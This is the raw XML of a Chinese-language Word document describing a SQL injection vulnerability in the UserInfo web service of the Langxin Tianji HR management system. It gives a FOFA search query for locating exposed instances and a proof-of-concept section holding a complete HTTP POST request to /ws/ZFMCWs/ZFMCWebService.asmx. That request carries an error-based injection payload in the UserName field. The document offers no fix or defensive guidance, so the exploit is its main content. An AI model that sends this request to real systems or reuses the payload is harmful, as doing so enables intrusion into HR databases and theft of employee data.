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AE728C8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>朗新天霁人力资源管理系统 UserInfo SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732520A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49605EF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FOFA：body="divRememberPwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB520C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD6B4D9"/>
    <w:p w14:paraId="1EF9FCDA"/>
    <w:p w14:paraId="43EFE7D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PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47730325">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C510B0">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D56161"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>POST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/ws/ZFMCWs/ZFMCWebService.asmx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379969"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBAC9A1">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Host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: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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127.0.0.1</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="591CC486">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Content-Type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text/xml;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charset=utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9DAFB0">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Content-Length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length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35055D05">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>SOAPAction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"http://tempuri.org/UserInfo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD2D8E5">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E9FF67">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;?xml version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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A83DAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"1.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoding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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A83DAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"utf-8"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?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A83DAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6090B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;soap:Envelope xmlns:xsi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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A83DAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"http://www.w3.org/2001/XMLSchema-instance"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> xmlns:xsd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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A83DAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"http://www.w3.org/2001/XMLSchema"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> xmlns:soap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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A83DAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"http://schemas.xmlsoap.org/soap/envelope/"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524EEC7C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>  &lt;soap:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102F1BFB">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>    &lt;UserInfo xmlns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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A83DAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"http://tempuri.org/"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A91F90">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>      &lt;UserName&gt;') AND 1004 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1004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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A83DAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>1004)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113)))-- OOxB&lt;/UserName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4837F61E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>      &lt;DeptName&gt;rt&lt;/DeptName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E580847">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>    &lt;/UserInfo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520053E7">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>  &lt;/soap:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C22505">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;/soap:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C208B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7266E281">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5E9DF2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12940BF"/>
    <w:rsid w:val="65A814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65</Words>
  <Characters>733</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>786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2025-11-17T08:46:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:19:22Z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eyJoZGlkIjoiMzEwNTM5NzYwMDRjMzkwZTVkZjY2ODkwMGIxNGU0OTUiLCJ1c2VySWQiOiIzMDk0MTQ5NTgifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>3B75329AE1DD4DCF8A60371D9C8B2646_12</vt:lpwstr>
  </property>
</Properties>
</file>